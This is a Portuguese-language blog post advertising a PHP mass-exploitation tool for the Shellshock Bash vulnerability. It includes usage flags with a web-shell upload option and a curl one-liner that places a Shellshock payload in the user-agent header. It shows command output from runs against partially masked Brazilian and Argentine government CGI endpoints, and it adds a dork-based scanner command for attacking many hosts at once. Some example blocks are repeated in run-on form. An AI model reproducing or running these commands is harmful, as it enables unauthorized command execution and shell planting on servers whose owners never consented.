sexta-feira, 1 de maio de 2015

Tool Xpl SHELLSHOCK Ch3ck - Mass exploitation

The tool inject a malicious user agent that allows exploring the vulnerabildiade sheellshock running server-side commands.


  # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  # EXPLOIT NAME:  Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL
  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

- DESCRIPTION - VULNERABILITY(SHELLSHOCK)

- CVE-2014-6271, CVE-2014-6277,
- CVE-2014-6278, CVE-2014-7169,
- CVE-2014-7186, CVE-2014-7187
Shellshock aka Bashdoor, is a security hole in the Bash shell on GNU's Unix-based systems, which was released on September 24, 2014.
Many servers on the Internet such as web servers use Bash to process commands, allowing an attacker to exploit the vulnerability Bash to execute arbitrary commands. This could allow an attacker to gain unauthorized access to a computer system.

- DESCRIPTION - TOOL
The tool inject a malicious user agent that allows exploring the vulnerability
sheelshock running server-side commands.

- DEPENDENCIES:
sudo apt-get install php5 php5-cli php5-curl

- EXECUTE:
     -t : SET TARGET.
  -f : SET FILE TARGETS.
  -c : SET COMMAND.
  -w : SET UPLOAD SHELL PHP.
  Execute:
  php xplSHELLSHOCK.php -t target -c command
  php xplSHELLSHOCK.php -f targets.txt -c command
  SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w
  OUTPUT VULN: SHELLSHOCK_vull.txt

- EXEMPLES:
php xpl.php -t 'http://www.xxxcamnpalxxx.com.br/cgi-bin/login.sh' -c pwd
CMD:
Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504  @ 2.00GHz GenuineIntel GNU/Linux
uid=1000(icone) gid=100(users) groups=100(users)
/ico/camnpal/cgi-bin
END_CMD:


php xpl.php -t 'http://www.xxxbnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd
CMD:
Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux
uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster)
/mnt/volume1/sitio/data/catalogos/cgi-bin
END_CMD:
OUTPUT:
- EXEMPLES: php xpl.php -t 'http://www.xxxcamnpalxxx.com.br/cgi-bin/login.sh' -c pwd CMD: Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504  @ 2.00GHz GenuineIntel GNU/Linux uid=1000(icone) gid=100(users) groups=100(users) /ico/camnpal/cgi-bin END_CMD:   php xpl.php -t 'http://www.xxxbnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd CMD: Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster) /mnt/volume1/sitio/data/catalogos/cgi-bin END_CMD: OUTPUT:


- USE CURL MANUAL EXPLOIT::
curl -v --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' 'http://www.xxxxxbnmxxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis'
OUTPUT:
- USE CURL MANUAL EXPLOIT:: curl -v --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' 'http://www.xxxxxbnmxxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis'


- EXPLOIT MASS USE SCANNER INURLBR
./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd"

More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

- ACESSO AO EXPLOIT:
Tool Xpl SHELLSHOCK Ch3ck
https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck



REFERENCES:
http://pt.wikipedia.org/wiki/Shellshock
http://curl.haxx.se/docs/manpage.html
https://shellshocker.net/

2 comentários:

  1. Parabens pelo excelente trabalho. Teria como rodar este scan em distros Centos? tentei instalar as dependencias mas sem sucesso.

    ResponderExcluir

............